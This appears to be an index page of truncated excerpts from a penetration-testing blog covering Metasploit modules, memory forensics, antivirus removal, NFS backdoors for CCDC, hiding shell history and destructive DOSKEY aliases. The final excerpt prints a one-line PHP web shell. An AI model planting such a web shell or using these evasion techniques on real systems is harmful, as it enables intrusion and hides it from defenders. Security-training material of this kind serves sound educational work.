Clik here to view.
Rapid fire PSEXEC for Metasploit
Exploit modules inside of metasploit don’t have the ability to run on multiple hosts with one swing of the bat. So I created some code to facilitate that. It’s really not much but there are some really...
View ArticleClik here to view.
Am I an Admin? Railgun Script
When you first step on a machine, you want to determine quickly if you are just a user or an administrator. Meterpreter doesn’t have a way to quickly check this. You could drop to a shell, check the...
View ArticleClik here to view.
Memory Forensics for Pentesters: Part 1
This is part one in a series of presentations I will be giving at the NoVAHackers meetings on forensics of all kinds as it can be leveraged in a penetration test. Memory Forensics for Pentesters:...
View ArticleClik here to view.
Revenge of the Bind Shell
Revenge of the Bind Shell from Practical Exploitation on Vimeo. BACKGROUND At the April 2010 NoVA Hackers meeting I discussed some of the offensive uses of IPv6 on current networks. Well, around that...
View ArticleClik here to view.
Acceptable Questions Checklist
“There is no stupid question” but, if it doesn’t meet this checklist, it’s officially a time wasting one. Acceptable questions checklist: 1. Have I tried it 2. Have I checked the manual, wiki, or forum...
View ArticleClik here to view.
Silently uninstall SEP
Uninstallation is not new Deleting and removing things on a box you own isn’t new This method and how to do it remotely was posted in Feb 2007 But I didn’t know how to do it, and I thought it was...
View ArticleClik here to view.
Offensive and Defensive SSH Patching at NoVA Hackers
This is definitely not my content, but I did want to highlight the talk Nicholas [1] gave at NoVA Hackers [2] this last November. Nicholas B. gives a talk about SSH Patching for Offensive and Defense...
View ArticleClik here to view.
Project Honeypot HTTP Blocklist module
Most malicious IP lists focus on the client side threat, where servers (hosted or exploited) host client side exploits or evil scripting. These don’t really help the server admins very much. Project...
View ArticleClik here to view.
Wayback Webapp Hacking
Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that allows you to get a list of every page that a Archive.org has for a given domain. This is...
View ArticleClik here to view.
Delicious Webapp Hacking
[UPDATE] This module (enum_delicious) has been pulled from Metasploit since Delicious no longer allows searching by site. In the last post I showed off how Archive.org’s Wayback machine can be used to...
View ArticleClik here to view.
Insider Threat Testing
This day and age everyone is worried about the insider threat. Internal Penetration Testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your...
View ArticleClik here to view.
Patch Adams
Thought I would share this video, if it isn’t a swift kick in the pants to do better with your life I don’t what is:
View ArticleClik here to view.
Updated: Password and Word lists
I thought updates went into RSS, but I guess they don’t so this is my “I updated stuff” post: /blog/2009/9/18/password-word-lists/
View ArticleClik here to view.
Cachedump for Meterpreter in action
Update: Cachedump has been added to the Metasploit trunk: https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12946 Pull it down: wget...
View ArticleClik here to view.
Interesting DNS Stuff - SRV Records
The following are good adds to your DNS brute force list: These are all SRV records so make sure your type is set correctly. The great thing about SRV records is that it tells you the port in the...
View ArticleClik here to view.
Metasploit on Wintel Systems
(No I’m not old enough to have used that term when it was the standard) I believe that this tweet should be archived for reference: http://twitter.com/#!/_ming_se/status/37688231185219584 And for those...
View ArticleClik here to view.
Creating Vulnerabilities: NFS Exports
Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap...
View ArticleClik here to view.
Destructive DOSKEY aliases
Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY: C:\Users\vmadmin>doskey /? Edits command lines, recalls Windows commands, and creates...
View ArticleClik here to view.
Issue a Linux command without it going into history
CORRECTION: Thanks to jduck for pointing it out, but you need to actually make a change to get this to work, reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/...
View ArticleClik here to view.
PHP Web Shell
This is mostly for my memory for CCDC<?php system($_GET['cmd']); ?> I wonder what will happen if a RSS reader doesn’t do proper filtering…
View Article